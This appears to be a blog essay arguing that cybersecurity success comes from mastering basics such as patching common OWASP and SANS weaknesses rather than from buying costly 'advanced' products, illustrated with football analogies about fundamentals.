One of the more common reasons why most organizations push back on spending for cyber security is the lack of a “return on investment.” All that fancy, shiny cyber-y stuff costs a lot of money without providing a clear benefit that is commensurate with the expenditure. Firewalls are expensive. IDS/IPS are expensive. SIEMs are expensive. Talent to run it all (if you can even find it) is expensive. Yet for all that expense the end result may still be a breach that costs millions of dollars, and the source of that breach is almost assuredly something that makes all that expense seem like a waste, not an investment. Advancing cyber security starts with promulgating the message that like most things in life, success is about the grind.
The Importance of Blocking and Tackling
A good, sound security capability can in fact be very pedestrian. Take some time to look at the SANS Top 25 (formerly 10) lists going back several years. Do the same thing for the OWASP Top 10. If you look closely you’ll notice that while names may change, the basic problems do not. Buffer overflows and cross-site scripting are not “advanced” or “sophisticated” but they work. All year, every year.
Addressing the most common security problems facing any enterprise does not require floor-to-ceiling displays showing maps of the world and stoplight charts and data flows from country to country. It doesn’t require a lot of software or hardware or subscriptions or licenses or feeds. The biggest problems are the most common ones that don’t necessarily require advanced skills or technology to resolve. You can harden your enterprise against the most likely and most dangerous problems without ever talking to a salesperson or worrying about how much you’re going to have to pay that guy with all the letters after his name.
Are You Ready For Some Football?
It wouldn’t be fall without a football analogy, so here is the first one of the season: If you knew who Odell Beckham Jr. was before Lena Dunham did, you know where I’m going with this. If you didn’t, go to YouTube and enter his name, I’ll wait…..
Amazing plays are not the result of practicing acrobatics in full pads. Wide Receivers don’t take contortionist classes. Training for football season at any level is about fundamentals. Everyone doing the same drills, or variations on a theme, that they’ve done since they first put on a helmet. Why? Because the bulk of success on the field is attributable to fundamentals. Blocking and tackling. Plays that make the highlight reels are the result of individual athleticism, instincts, and drive, but no receiver gets into position to make the highlight reel without mastering the basics first.
A team of journeymen who are well versed in the basics alone may not make the playoffs, much less the Super Bowl, but that’s not the point; you want to avoid being beaten by the second string of the local community college. If you want to know how well buying expensive “solutions” to your problems works, I invite you to check out the drama that has been Washington Redskins since 1999.
Its About Perspective
You can’t read an article on cybersecurity and not see the words “advanced” or “sophisticated” either in the text or the half-dozen ads around the story. Security companies cannot move product or get customers to renew subscriptions without promoting some level of fear, uncertainty and doubt. No product salesperson will bring up the fact that procuring the next-generation whatever they are selling is almost assuredly buying a castle that will be installed on a foundation of sand (to be fair: it’s not their job to revamp your security program).
This is not to say you ignore any class of threats, but you need to put it all into perspective. You don’t buy an alarm system for your house and then leave your doors and windows open. You do not spend more money on the car with the highest safety ratings and then roll out without wearing your seat belt. You don’t buy your kids bicycle helmets and then set them loose on the freeway. You do all the things that keep you and yours safe because to ignore the basics undermines the advanced. The same holds true in cyber security, and the sooner we put on our Carhartts and spend more sweat equity than we do cash, the sooner we are likely to see real improvements.